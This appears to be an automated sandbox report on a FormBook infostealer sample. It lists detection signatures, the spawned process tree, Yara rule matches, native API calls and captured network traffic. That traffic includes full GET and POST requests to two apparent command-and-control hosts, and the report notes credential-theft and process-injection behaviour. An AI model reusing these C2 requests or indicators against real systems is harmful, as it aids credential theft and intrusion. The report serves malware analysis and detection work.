
Analysis Report Mqbmupv_Signed_.exe

Overview

General Information

Sample Name: Mqbmupv_Signed_.exe
Analysis ID: 288093
MD5: 20a3b044b6d1b39051e35269e6590c0b
SHA1: bc6bc3a617091a5f13dcfe134b3a55d19e8f77e6
SHA256: 2ead77594bc7d6fb376764fad896f830955a1ac70155c0f9feb42299f5c788a9
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Mqbmupv_Signed_.exe (PID: 6892 cmdline: 'C:\Users\user\Desktop\Mqbmupv_Signed_.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
    • notepad.exe (PID: 344 cmdline: C:\Windows\System32\Notepad.exe MD5: D693F13FE3AA2010B854C4C60671B8E2)
      • cmd.exe (PID: 6308 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6316 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ieinstal.exe (PID: 6544 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Mqbmnet.exe (PID: 6912 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 2212 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • Mqbmnet.exe (PID: 5976 cmdline: 'C:\Users\user\AppData\Local\Mqbmnet.exe' MD5: 20A3B044B6D1B39051E35269E6590C0B)
          • ieinstal.exe (PID: 5204 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • autochk.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • ipconfig.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
        • control.exe (PID: 4864 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x87:$hotkey: \x0AHotKey=1
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\user\AppData\Local\Mqbm.url | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x5c:$icon: IconFile=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x1258:$file: URL=
  • 0x123c:$url_explicit: [InternetShortcut]
00000015.00000003.340352815.0000000004464000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x1284:$icon: IconFile=
  • 0x123c:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x620:$file: URL=
  • 0x604:$url_explicit: [InternetShortcut]
00000000.00000003.218982955.00000000023A4000.00000004.00000001.sdmp | Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x64c:$icon: IconFile=
  • 0x604:$url_explicit: [InternetShortcut]
0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
29.2.ieinstal.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
29.2.ieinstal.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b46a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
29.2.ieinstal.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17539:$sqlite3step: 68 34 1C 7B E1
  • 0x1764c:$sqlite3step: 68 34 1C 7B E1
  • 0x17568:$sqlite3text: 68 38 2A 90 C5
  • 0x1768d:$sqlite3text: 68 38 2A 90 C5
  • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
9.2.ieinstal.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.ieinstal.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c26a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | Virustotal: Detection: 27%
Source: C:\Users\user\AppData\Local\Mqbmnet.exe | ReversingLabs: Detection: 45%
Multi AV Scanner detection for submitted file
Source: Mqbmupv_Signed_.exe | Virustotal: Detection: 27%
Source: Mqbmupv_Signed_.exe | ReversingLabs: Detection: 45%
Yara detected FormBook
Source: Yara match | File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 29.2.ieinstal.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.ieinstal.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Windows\SysWOW64\notepad.exe | Code function: 2_2_5048518C GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop esi
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop edi
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49754
Source: global traffic | HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | IP Address: 162.159.129.233
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: GOOGLEUS
Source: Joe Sandbox View | JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic | HTTP traffic detected: POST /ksh/ HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Content-Length: 413 | Cache-Control: no-cache | Origin: http://www.thelocaladda.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.thelocaladda.com/ksh/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /ksh/ HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Content-Length: 184809 | Cache-Control: no-cache | Origin: http://www.thelocaladda.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.thelocaladda.com/ksh/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /ksh/ HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Content-Length: 413 | Cache-Control: no-cache | Origin: http://www.kingofinvest.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kingofinvest.com/ksh/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: POST /ksh/ HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Content-Length: 184809 | Cache-Control: no-cache | Origin: http://www.kingofinvest.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.kingofinvest.com/ksh/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: global traffic | HTTP traffic detected: GET /ksh/?5jL=uFQxALFPNtNHURy&ATxxQxK=xROuys6hOw0xE+Dg7XC6mGOo/d7SGNs3P82B+JeimXH5Y1WQGK5kyuWTJN9Z6xMQi+6b HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ksh/?ATxxQxK=ZldP4CUsQhXvJw3kkl/m6rn8dtomETaFfa4bezIFxsgv0fex9FlIh/12ILez0Zmx81j4&5jL=uFQxALFPNtNHURy HTTP/1.1 | Host: www.kingofinvest.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown | HTTP traffic detected: POST /ksh/ HTTP/1.1 | Host: www.thelocaladda.com | Connection: close | Content-Length: 413 | Cache-Control: no-cache | Origin: http://www.thelocaladda.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.thelocaladda.com/ksh/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000F.00000000.308423618.000000000B156000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE

        System Summary:

        Detected FormBook malware
        Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logri.ini
        Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\9M55PA10\9M5logrv.ini
        Malicious sample detected (through community Yara rule)
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.399135517.0000000003800000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474955241.0000000000910000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.474675547.00000000007D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343939921.00000000009A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001E.00000002.397779969.0000000000F30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000019.00000002.471509129.0000000000450000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.395148815.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.344896529.0000000002B30000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000009.00000002.343414825.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 0000001D.00000002.397372666.0000000003490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 9.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 29.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419C90 NtCreateFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419D40 NtReadFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419DC0 NtClose,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419E70 NtAllocateVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419C8A NtCreateFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419D3A NtReadFile,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419DBA NtClose,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_00419E6A NtAllocateVirtualMemory,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A98F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A97A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 9_2_031A95D0 NtClose,LdrInitializeThunk,
